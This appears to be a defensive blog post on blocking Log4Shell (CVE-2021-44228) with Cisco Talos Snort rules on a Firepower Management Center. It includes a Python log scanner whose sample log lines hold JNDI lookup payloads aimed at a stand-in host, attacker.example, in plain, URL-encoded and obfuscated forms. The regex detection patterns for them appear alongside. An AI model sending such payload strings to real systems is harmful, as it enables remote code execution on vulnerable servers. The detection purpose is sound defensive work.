
IPS FMC for Log4Shell

In general terms, last week a zero-day vulnerability called Log4Shell was disclosed, and it was already being exploited by remote attackers around the world. A zero-day is a vulnerability that becomes public before a fix is available or deployed, so the main threat is that, until the patch is released and installed on the affected systems, attackers can exploit the hole freely.

That said, a critical remote code execution vulnerability has been disclosed in the Apache Software Foundation's Log4j 2 library, the widely used Java logging framework that replaced the older Log4j 1.x and is bundled into many popular Java projects such as Apache Struts 2 and Apache Solr. Exploiting it can give an attacker control of the affected server. It is exploitable in default configurations by an unauthenticated remote attacker against any application that logs attacker-controlled input through a vulnerable Log4j version.

This vulnerability, tracked as CVE-2021-44228, received the maximum CVSS severity score of 10.0 and is widely considered easy to exploit.

Cisco Talos has released Snort signatures in the IPS rule update package to detect exploit attempts targeting CVE-2021-44228.

They are Snort 2 SIDs 58722 - 58744 and Snort 3 SIDs 300055 - 300058.

Before doing that, you need the latest rule update package installed on the FMC (as of today, Snort Rule Update 2021-12-11-002-vrt), the rules must be enabled in every intrusion policy in use, and those policies must be redeployed to the firewalls. Talos kept adding and revising rules for obfuscated variants of the payload in later packages, so repeat the update step as new rule updates appear.


#1) Update the rule package on your FMC:

Updates / Rule Updates / Download new rules from the Support Site / [Import]

#2) Filter the intrusion rules for CVE:"2021-44228":

Policies / Intrusion / <your intrusion policy> / Rules / Rule Content / Reference / CVE ID

Under "Rule State", select all the matching rules and choose "Drop and Generate Events". Note that "Drop" only takes effect on inline deployments; on passive or inline-tap interfaces the rules will alert but cannot block.

Click Policy Information, commit the changes, then Deploy the policy to the managed devices.
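To see what this class of signature keys on, here is an added example that is not from the original post and is not Cisco's or Talos's rule logic: a stand-alone Python check that undoes URL encoding and the nested-lookup obfuscations (`${lower:..}`, `${upper:..}`, `${..:-..}`) attackers used against the first detections, then flags the JNDI lookup string. The log lines, the `attacker.example` host and the `SAMPLE_LOG` name are constructed for the example. It is a simplified approximation for triaging web-server or proxy logs behind the sensor, not a replacement for the IPS rules.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for this example (not captured from a real system):
# 1 benign request, 2 plain probe in the User-Agent, 3 URL-encoded probe in the query
# string, 4 the same string hidden behind nested Log4j lookups.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:00:03 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [11/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://attacker.example/a}"',
]

# The string a vulnerable Log4j 2 expands: "${jndi:<scheme>:...}", in any case.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Innermost ${lower:x} / ${upper:x} lookups, which resolve to the literal text x re-cased.
CASE_LOOKUP_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# Innermost lookups carrying a default value, e.g. ${::-j} or ${env:UNSET:-j}:
# when the lookup itself yields nothing, Log4j substitutes the text after ":-".
DEFAULT_LOOKUP_RE = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")


def normalize(text: str, rounds: int = 5) -> str:
    """Undo URL encoding and collapse nested lookups from the inside out.

    Each round resolves one layer of nesting; stop early when nothing changes.
    """
    for _ in range(rounds):
        before = text
        text = unquote(text)
        text = CASE_LOOKUP_RE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = DEFAULT_LOOKUP_RE.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def scan(lines):
    """Return (line_number, normalized_payload) for every line containing a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        norm = normalize(line)
        match = JNDI_RE.search(norm)
        if match:
            hits.append((number, norm[match.start():match.start() + 60]))
    return hits


if __name__ == "__main__":
    for number, payload in scan(SAMPLE_LOG):
        print(f"line {number}: {payload}")
```

Running the file reports lines 2, 3 and 4 and prints the de-obfuscated lookup string for each, which is the value worth pivoting on in the FMC intrusion events (the LDAP/RMI host the payload points to). A single literal match on `${jndi:` would miss lines 3 and 4, which is why the rule updates after the first release matter.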

